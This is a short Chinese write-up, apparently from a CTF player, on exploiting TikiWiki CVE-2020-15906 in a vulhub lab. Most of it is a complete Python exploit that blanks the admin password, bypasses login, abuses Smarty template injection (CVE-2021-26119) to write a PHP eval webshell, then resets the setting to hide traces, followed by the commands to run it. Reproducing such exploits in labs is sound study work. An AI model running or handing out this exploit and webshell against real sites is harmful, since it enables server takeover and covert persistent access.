漏洞

CVE-2020-15906

vulhub/tikiwiki/CVE-2020-15906/README.zh-cn.md at master · vulhub/vulhub · GitHub

比赛遇见个tikiwiki,byd执行不了几条命令就崩,写马还写不进去,各种转义转着转着就崩了,比如这个python poc.py 127.0.0.1:8080 / 'echo "\<?php${IFS}?\>">shell.php',这里空格会截断,转义就崩,用IFS也崩。比赛的时候没给我干红温复现给我干红温了。

这个poc的利用部分是CVE-2021-26119的模板注入,直接把模板注入里的shell_exec改成file_put_contents就能写马了。

pocw.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
import requests
import sys
import re


def auth_bypass(s, t):
    d = {
        "ticket" : "",
        "user" : "admin",
        "pass" : "trololololol",
    }
    h = { "referer" : t }
    d["ticket"] = get_ticket(s, "%stiki-login.php" % t)
    d["pass"] = "" # blank login
    r = s.post("%stiki-login.php" % t, data=d, headers=h)
    r = s.get("%stiki-admin.php" % t)
    assert ("You do not have the permission that is needed" not in r.text), "(-) authentication bypass failed!"

def black_password(s, t):
    uri = "%stiki-login.php" % t
    # setup cookies here
    s.get(uri)
    ticket = get_ticket(s, uri)
    d = {
        'user':'admin', 
        'pass':'trololololol',
    }
    # crafted especially so unsuccessful_logins isn't recorded
    for i in range(0, 51):
        r = s.post(uri, d)
        if("Account requires administrator approval." in r.text):
            print("(+) admin password blanked!")
            return
    raise Exception("(-) auth bypass failed!") 

def get_ticket(s, uri):
    h = { "referer" : uri }
    r = s.get(uri)
    match = re.search('class="ticket" name="ticket" value="(.*)" \/>', r.text)
    assert match, "(-) csrf ticket leak failed!"
    return match.group(1)

def trigger_or_patch_ssti(s, t, c=None):
    # CVE-2021-26119
    p = { "page": "look" }
    h = { "referer" : t }
    bypass = "startrce{$smarty.template_object->smarty->disableSecurity()->display('string:{file_put_contents(\"/var/www/html/%s\",\"<?php eval(\$_POST[1])?>\")}')}endrce" % c
    d = {
        "ticket" : get_ticket(s, "%stiki-admin.php" % t),
        "feature_custom_html_head_content" : bypass if c else '',
        "lm_preference[]": "feature_custom_html_head_content"
    }
    r = s.post("%stiki-admin.php" % t, params=p, data=d, headers=h)
    r = s.get("%stiki-index.php" % t)
    if c != None:
        assert ("startrce" in r.text and "endrce" in r.text), "(-) rce failed!"
        cmdr = r.text.split("startrce")[1].split("endrce")[0]
        print(cmdr.strip())

def main():
    if(len(sys.argv) < 4):
        print("(+) usage: %s <host> <path> <cmd>" % sys.argv[0])
        print("(+) eg: %s 192.168.75.141 / id"% sys.argv[0])
        print("(+) eg: %s 192.168.75.141 /tiki-20.3/ id" % sys.argv[0])
        return
    p = sys.argv[2]
    c = sys.argv[3]
    p = p + "/" if not p.endswith("/") else p
    p = "/" + p if not p.startswith("/") else p
    t = "http://%s%s" % (sys.argv[1], p)
    s = requests.Session()
    print("(+) blanking password...")
    black_password(s, t)
    print("(+) getting a session...")
    auth_bypass(s, t)
    print("(+) auth bypass successful!")
    print("(+) triggering rce...\n")
    # trigger for rce
    trigger_or_patch_ssti(s, t, c)
    # patch so we stay hidden
    trigger_or_patch_ssti(s, t)

if __name__ == '__main__':
    main()

python pocw.py 127.0.0.1:8080 / shell.php,shell.php是写马的文件名,内容是<?php eval($_POST[1])?>。写完以后面崩了也没事,这个马还能继续用。

还有,这个沟槽的poc不能加80端口,python poc.py 127.0.0.1:80 / 'whoami'就报错python poc.py 127.0.0.1 / 'whoami'就正常。其他端口加上都没事,就80不行。